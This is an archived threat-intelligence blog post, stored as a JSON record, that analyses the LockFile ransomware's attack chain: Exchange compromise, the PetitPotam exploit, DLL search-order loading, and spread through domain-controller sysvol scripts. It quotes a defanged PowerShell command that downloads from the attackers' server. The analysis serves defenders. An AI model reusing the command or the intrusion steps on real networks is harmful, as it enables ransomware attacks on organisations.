{
	"id": "a486852b-ff80-402e-a360-7fe7486fb0e3",
	"created_at": "2026-04-06T00:21:29.857111Z",
	"updated_at": "2026-04-10T03:20:05.657092Z",
	"deleted_at": null,
	"sha1_hash": "45e933fd76936bc88f280a352f183402af248cbf",
	"title": "LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 74053,
	"plain_text": "LockFile: Ransomware Uses PetitPotam Exploit to Compromise\r\nWindows Domain Controllers\r\nArchived: 2026-04-05 14:22:43 UTC\r\nUPDATE August 23: Third parties have identified a ProxyShell exploit as a potential vector for the PowerShell-related commands that are identified in this blog. Researcher Kevin Beaumont first spotted that ProxyShell was\r\nbeing exploited from 209.14.0[.]234 on August 13. The ProxyShell and LockFile link is also mentioned in this\r\nTwitter thread. Protection information has been updated below based on this new information.\r\nWhat appears to be a new ransomware family is being used to target victims in various industries around the\r\nglobe.\r\nThe LockFile ransomware was first observed on the network of a U.S. financial organization on July 20, 2021,\r\nwith its latest activity seen as recently as August 20. LockFile has been seen on organizations around the world,\r\nwith most of its victims based in the U.S. and Asia.\r\nIndications are that the attackers gain access to victims' networks via Microsoft Exchange Servers, and then use\r\nthe incompletely patched PetitPotam vulnerability to gain access to the domain controller, and then spread across\r\nthe network. It is not clear how the attackers gain initial access to the Microsoft Exchange Servers.\r\nVictims are in the manufacturing, financial services, engineering, legal, business services, and travel and tourism\r\nsectors.\r\nThe attackers behind this ransomware use a ransom note with a similar design to that used by the LockBit\r\nransomware gang (Figure 1) and reference the Conti gang in the email address they use -\r\ncontact@contipauper[.]com.\r\nAttack chain\r\nExchange servers are compromised through an as yet unidentified technique. 
On exploitation, the attacker\r\nexecutes a PowerShell command such as the following:\r\npowershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH\r\nOther powershell wget commands to the same IP address use similar seemingly random high port numbers. It is\r\nunknown exactly what is downloaded by the PowerShell command; however, the attackers maintain access on\r\nvictim networks for at least several days before beginning the ransomware attack.\r\nTypically around 20 to 30 minutes prior to deploying ransomware, the attackers install a set of tools onto the\r\ncompromised Exchange Server. Included in these tools are:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows\r\nPage 1 of 3\n\nAn exploit for the CVE-2021-36942 vulnerability (aka PetitPotam). The code appears to be copied from\r\nhttps://github.com/zcgonvh/EfsPotato. This is in a file called “efspotato.exe”.\r\nTwo files: active_desktop_render.dll and active_desktop_launcher.exe\r\nThe active_desktop_launcher.exe is a legitimate version of KuGou Active Desktop. The executable is being used\r\nin a DLL search order loading attack to load a malicious active_desktop_render.dll file. This\r\nactive_desktop_render.dll file, when loaded by the active_desktop_launcher.exe, attempts to load and decrypt a\r\nfile in the local directory called “desktop.ini”. If the file is successfully loaded and decrypted, shellcode from the\r\nfile is executed. As the investigation into these attacks is ongoing, a copy of “desktop.ini” has yet to be retrieved\r\nfor analysis.\r\nThe encrypted shellcode, however, very likely activates the efspotato.exe file that exploits PetitPotam. This is an\r\nNTLM relay attack bug that can be used by a low-privileged attacker to take over a domain controller. 
It was\r\npatched in Microsoft’s August Patch Tuesday release, but it subsequently emerged that the fix released reportedly\r\ndid not fully patch the vulnerability.\r\nOnce access has been gained to the local domain controller, the attackers copy over the LockFile ransomware,\r\nalong with a batch file and supporting executables, onto the domain controller. These files are copied into the\r\n“sysvol\\domain\\scripts” directory. This directory is used to deploy scripts to network clients when they\r\nauthenticate to the domain controller. This means that any clients that authenticate to the domain after these files\r\nhave been copied over will execute them.\r\nThe files that are copied into the Sysvol directory are:\r\nAutologin.bat\r\nAutologin.exe\r\nAutologin.dll\r\nAutologin.sys\r\nAutoupdate.exe\r\nThe Autoupdate.exe file is a variant of the LockFile payload, which is unique to each organization targeted.\r\nThe Autologin.exe, Autologin.dll, and Autologin.sys files are all part of a toolkit called the Kernel Driver Utility\r\n(KDU - https://github.com/hfiref0x/KDU). Autologin.dll is the “Tanikaze.dll” component, and Autologin.exe is\r\nthe “Hamakaze” component. It is currently unclear exactly how the KDU tool is utilized by the attacker in\r\nconjunction with the ransomware. Regardless of how they are utilized, the LockFile ransomware is ultimately\r\nexecuted.\r\nA new threat?\r\nLockFile appears to be a new threat on the already crowded ransomware landscape. The investigation into this\r\nthreat, and whether it may have links to any previously seen or retired ransomware threats, continues. 
This is an\r\nongoing investigation and Symantec, part of Broadcom Software, may update this blog with new information if it\r\ncomes to light.\r\nProtection\r\nThe following protections are in place to protect customers against LockFile attacks:\r\nFile-based\r\nRansom.Lockfile\r\nRansom.CryptoTorLocker\r\nNetwork-based\r\nOS Attack: SMB EFS NTLM Relay Attempt\r\nAudit: SMB EFS NTLM Relay Attempt 2\r\nWeb Attack: Microsoft Exchange Server RCE CVE-2021-34473\r\nWeb Attack: Microsoft Exchange Server Elevation of Privilege CVE-2021-34523\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nPolicy-based\r\nSymantec Data Center Security default hardening policies for Microsoft Exchange servers and Windows Domain\r\nControllers protect against ProxyShell vulnerabilities and prevent LockFile ransomware attacks on Domain\r\nControllers.\r\nIndicators of Compromise\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
	],
	"report_names": [
		"lockfile-ransomware-new-petitpotam-windows"
	],
	"threat_actors": [],
	"ts_created_at": 1775434889,
	"ts_updated_at": 1775791205,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/45e933fd76936bc88f280a352f183402af248cbf.pdf",
		"text": "https://archive.orkl.eu/45e933fd76936bc88f280a352f183402af248cbf.txt",
		"img": "https://archive.orkl.eu/45e933fd76936bc88f280a352f183402af248cbf.jpg"
	}
}